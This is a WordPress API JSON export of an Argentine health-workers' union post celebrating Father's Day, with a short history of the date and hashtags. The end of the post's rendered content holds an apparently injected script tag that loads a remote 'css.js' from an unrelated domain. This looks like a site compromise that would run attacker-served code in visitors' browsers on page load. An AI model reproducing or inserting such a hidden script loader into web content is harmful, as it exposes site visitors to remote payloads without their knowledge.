{"id":18583,"date":"2025-06-15T00:00:00","date_gmt":"2025-06-15T03:00:00","guid":{"rendered":"http:\/\/atsalaplata.org.ar\/web\/?p=18583"},"modified":"2026-02-02T17:01:06","modified_gmt":"2026-02-02T20:01:06","slug":"feliz-dia-del-padre-3","status":"publish","type":"post","link":"http:\/\/atsalaplata.org.ar\/web\/2025\/06\/feliz-dia-del-padre-3\/","title":{"rendered":"\u00a1Feliz D\u00eda del Padre!"},"content":{"rendered":"\n<p><img loading=\"lazy\" decoding=\"async\" height=\"16\" width=\"16\" alt=\"\ud83d\udc68\" src=\"https:\/\/static.xx.fbcdn.net\/images\/emoji.php\/v9\/te\/1\/16\/1f468.png\">Cada tercer domingo de junio es celebrado el \u00abD\u00eda del Padre\u00bb en Argentina.<\/p>\n\n\n\n<p><a><\/a>Originariamente, en nuestro pa\u00eds, esta fecha se celebraba el 24 de agosto, en conmemoraci\u00f3n del nacimiento de Mercedes Tomasa, \u00fanica hija del General Jos\u00e9 de San Mart\u00edn, pero en 1960, se adopt\u00f3 a la tradici\u00f3n Estadounidense.<\/p>\n\n\n\n<p>En este d\u00eda tan especial, queremos reconocer a quienes ejercen la paternidad con amor, dedicaci\u00f3n y esfuerzo diario para la mejor crianza de sus hijos\/as.<\/p>\n\n\n\n<p>En particular, les deseamos un muy feliz d\u00eda a los padres que integran la gran familia de la SANIDAD.<img loading=\"lazy\" decoding=\"async\" height=\"16\" width=\"16\" alt=\"\ud83e\udd70\" src=\"https:\/\/static.xx.fbcdn.net\/images\/emoji.php\/v9\/tea\/1\/16\/1f970.png\"><\/p>\n\n\n\n<p>\u00a1Feliz d\u00eda del Padre!<\/p>\n\n\n\n<p><a href=\"https:\/\/www.facebook.com\/hashtag\/sanidadatsalaplata?__eep__=6&amp;__cft__[0]=AZXis72NiCQ-fhncYICO-anIoYjD413B4TdBHvbPu7hLXRaxr4HEMlk-HphwUv0M6GtJmFMkkcA27f1s2OtbhN8EWEH_DUpOgsAqoeLoOHxp3NeWf0NOy8t9uDMGsmmwXQqMcSGA66za9bvNe_Xngbdh&amp;__tn__=*NK-R\" target=\"_blank\" rel=\"noreferrer noopener\">#SanidadATSALaPlata<\/a><a href=\"https:\/\/www.facebook.com\/hashtag\/siemprejuntoavos?__eep__=6&amp;__cft__[0]=AZXis72NiCQ-fhncYICO-anIoYjD413B4TdBHvbPu7hLXRaxr4HEMlk-HphwUv0M6GtJmFMkkcA27f1s2OtbhN8EWEH_DUpOgsAqoeLoOHxp3NeWf0NOy8t9uDMGsmmwXQqMcSGA66za9bvNe_Xngbdh&amp;__tn__=*NK-R\" target=\"_blank\" rel=\"noreferrer noopener\">#SiempreJuntoAVos<\/a><\/p>\n\n\n\n<p><\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>Cada tercer domingo de junio es celebrado el \u00abD\u00eda del Padre\u00bb en Argentina. Originariamente, en&#8230;<\/p>\n","protected":false},"author":2,"featured_media":18584,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[146,98,147,97,85,148],"tags":[],"class_list":["post-18583","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-destacado","category-home","category-novedades","category-sec-de-cultura","category-sec-de-prensa","category-ultimas-noticias"],"_links":{"self":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18583","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/comments?post=18583"}],"version-history":[{"count":2,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18583\/revisions"}],"predecessor-version":[{"id":20794,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18583\/revisions\/20794"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media\/18584"}],"wp:attachment":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media?parent=18583"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/categories?post=18583"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/tags?post=18583"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}